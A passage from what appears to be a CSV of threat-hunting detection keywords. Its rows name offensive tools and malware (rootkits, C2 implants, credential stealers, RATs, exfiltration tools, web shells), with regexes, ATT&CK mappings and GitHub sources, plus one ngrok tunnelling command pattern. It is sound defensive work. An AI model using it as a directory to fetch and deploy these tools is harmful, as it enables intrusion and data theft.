Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9130" "*/nfs-ls.nse*",".{0,1000}\/nfs\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9131" "*/nfs-showmount.nse*",".{0,1000}\/nfs\-showmount\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9132" "*/nfs-statfs.nse*",".{0,1000}\/nfs\-statfs\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9133" "*/nginxed-root.sh*",".{0,1000}\/nginxed\-root\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","9134" "*/ngrok http 3333 > /dev/null 2>&1*",".{0,1000}\/ngrok\shttp\s3333\s\>\s\/dev\/null\s2\>\&1.{0,1000}","offensive_tool_keyword","saycheese","Grab target's webcam shots by link","T1213 - T1071 - T1102 - T1123 - T1185 - T1200","TA0001 - TA0005 - TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/hangetzzu/saycheese","1","0","#linux","N/A","9","10","1175","962","2024-06-18T23:39:41Z","2019-04-29T04:07:00Z","9135" "*/Ngrok-Disk.dll*",".{0,1000}\/Ngrok\-Disk\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","9141" "*/Ngrok-Install.dll*",".{0,1000}\/Ngrok\-Install\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - 
TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","9142" "*/NiceRAT.git*",".{0,1000}\/NiceRAT\.git.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","9144" "*/NiceRAT.py*",".{0,1000}\/NiceRAT\.py.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","9145" "*/NiceRAT-1.0.0.zip*",".{0,1000}\/NiceRAT\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","9146" "*/nidem/kerberoast*",".{0,1000}\/nidem\/kerberoast.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","N/A","10","1433","317","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z","9147" "*/Nidhogg.cpp*",".{0,1000}\/Nidhogg\.cpp.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to 
use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","9148" "*/Nidhogg.exe*",".{0,1000}\/Nidhogg\.exe.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","9149" 
"*/Nidhogg.git*",".{0,1000}\/Nidhogg\.git.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","9150" "*/Nidhogg.zip*",".{0,1000}\/Nidhogg\.zip.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation 
tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","9151" "*/NidhoggClient.exe*",".{0,1000}\/NidhoggClient\.exe.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","9152" "*/NidhoggClient/*",".{0,1000}\/NidhoggClient\/.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - 
T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","1","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","9153" "*/nightCrawler.ps1*",".{0,1000}\/nightCrawler\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","9154" "*/Nightmangle.git*",".{0,1000}\/Nightmangle\.git.{0,1000}","offensive_tool_keyword","Nightmangle","Nightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","N/A","10","10","156","19","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z","9155" "*/nikto.git*",".{0,1000}\/nikto\.git.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/sullo/nikto","1","1","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","9156" "*/nikto.pl*",".{0,1000}\/nikto\.pl.{0,1000}","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/sullo/nikto","1","1","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","9157" "*/nikto.pl*",".{0,1000}\/nikto\.pl.{0,1000}","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability 
Scanner","https://github.com/sullo/nikto","1","1","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","9158" "*/NimBlackout*",".{0,1000}\/NimBlackout.{0,1000}","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","1","N/A","N/A","N/A","4","352","42","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z","9159" "*/NimBlackout*",".{0,1000}\/NimBlackout.{0,1000}","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","1","N/A","N/A","N/A","4","352","42","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z","9160" "*/NimBlackout*",".{0,1000}\/NimBlackout.{0,1000}","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","1","N/A","N/A","N/A","4","352","42","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z","9161" "*/NimBlackout*",".{0,1000}\/NimBlackout.{0,1000}","offensive_tool_keyword","NimBlackout","Kill AV/EDR leveraging BYOVD attack","T1562.001 - T1055.001 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Helixo32/NimBlackout","1","0","#linux","N/A","N/A","4","352","42","2023-07-11T07:32:50Z","2023-07-06T18:40:02Z","9162" "*/nimcrypt.nim*",".{0,1000}\/nimcrypt\.nim.{0,1000}","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","1","N/A","N/A","N/A","1","98","7","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z","9163" 
"*/nimcrypt/*",".{0,1000}\/nimcrypt\/.{0,1000}","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","1","N/A","N/A","N/A","1","98","7","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z","9164" "*/Nimcrypt2*",".{0,1000}\/Nimcrypt2.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1027 - T1202 - T1059.005 - T1105 - T1045","TA0005 - TA0011 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","N/A","8","771","124","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z","9165" "*/NimDllSideload.git*",".{0,1000}\/NimDllSideload\.git.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","1","N/A","N/A","9","2","167","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z","9166" "*/NimDllSideload/*",".{0,1000}\/NimDllSideload\/.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","1","N/A","N/A","9","2","167","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z","9167" "*/NimExec.git*",".{0,1000}\/NimExec\.git.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","N/A","4","372","38","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z","9168" "*/Nimperiments.git*",".{0,1000}\/Nimperiments\.git.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - 
TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","9169" "*/NimPlant.*",".{0,1000}\/NimPlant\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","9170" "*/NimPlant/*",".{0,1000}\/NimPlant\/.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","9171" "*/nimplants/*",".{0,1000}\/nimplants\/.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","9172" "*/nimproxydll.git*",".{0,1000}\/nimproxydll\.git.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","1","N/A","N/A","9","1","10","0","2024-05-26T17:34:01Z","2024-03-15T15:15:45Z","9173" "*/nimproxydll/*",".{0,1000}\/nimproxydll\/.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","1","N/A","N/A","9","1","10","0","2024-05-26T17:34:01Z","2024-03-15T15:15:45Z","9174" 
"*/ninja.crt*",".{0,1000}\/ninja\.crt.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","9178" "*/Ninja.git*",".{0,1000}\/Ninja\.git.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","9179" "*/ninja.key*",".{0,1000}\/ninja\.key.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","9180" "*/Ninja.py*",".{0,1000}\/Ninja\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","9181" "*/nipe.git",".{0,1000}\/nipe\.git","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","0","N/A","N/A","N/A","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","9182" "*/nipe.pl",".{0,1000}\/nipe\.pl","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - 
T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","1","N/A","N/A","N/A","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","9183" "*/nishang*",".{0,1000}\/nishang.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security. penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","9188" "*/nishang/*",".{0,1000}\/nishang\/.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","9189" "*/NIX REMOTE WEB-SHELL.php*",".{0,1000}\/NIX\sREMOTE\sWEB\-SHELL\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9190" "*/nje-node-brute.nse*",".{0,1000}\/nje\-node\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9191" "*/nje-pass-brute.nse*",".{0,1000}\/nje\-pass\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9192" "*/NJRAT 7.exe*",".{0,1000}\/NJRAT\s7\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1071.001 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1555.003 - T1132.001 - T1005 - T1568.001 - T1041 - T1083 - T1562.004 - T1070.004 - T1070.009 - T1105 - T1056.001 - T1112 - T1106 - T1571 - T1027.004 - T1027.013 - T1120 - T1057 - T1012 - T1021.001 - T1018 - T1091 - T1113 - T1082 - T1033 - T1125","TA0002 - TA0003 - TA0005 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Transparent Tribe - Group5 - Aquatic Panda - APT41 - LazyScripter - Gorgon Group - TA2541 - APT-C-36","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","9193" "*/NLBrute*.rar*",".{0,1000}\/NLBrute.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential 
Access","https://github.com/amazond/NLBrute-1.2","1","1","N/A","N/A","10","1","1","2","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z","9194" "*/NLBrute*.zip*",".{0,1000}\/NLBrute.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","1","N/A","N/A","10","1","1","2","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z","9195" "*/NLBrute.exe*",".{0,1000}\/NLBrute\.exe.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","1","N/A","N/A","10","1","1","2","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z","9196" "*/nmap.py*",".{0,1000}\/nmap\.py.{0,1000}","offensive_tool_keyword","crackmapexec","parser nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","9197" "*/nmap_smb_scan_all_*.txt*",".{0,1000}\/nmap_smb_scan_all_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black 
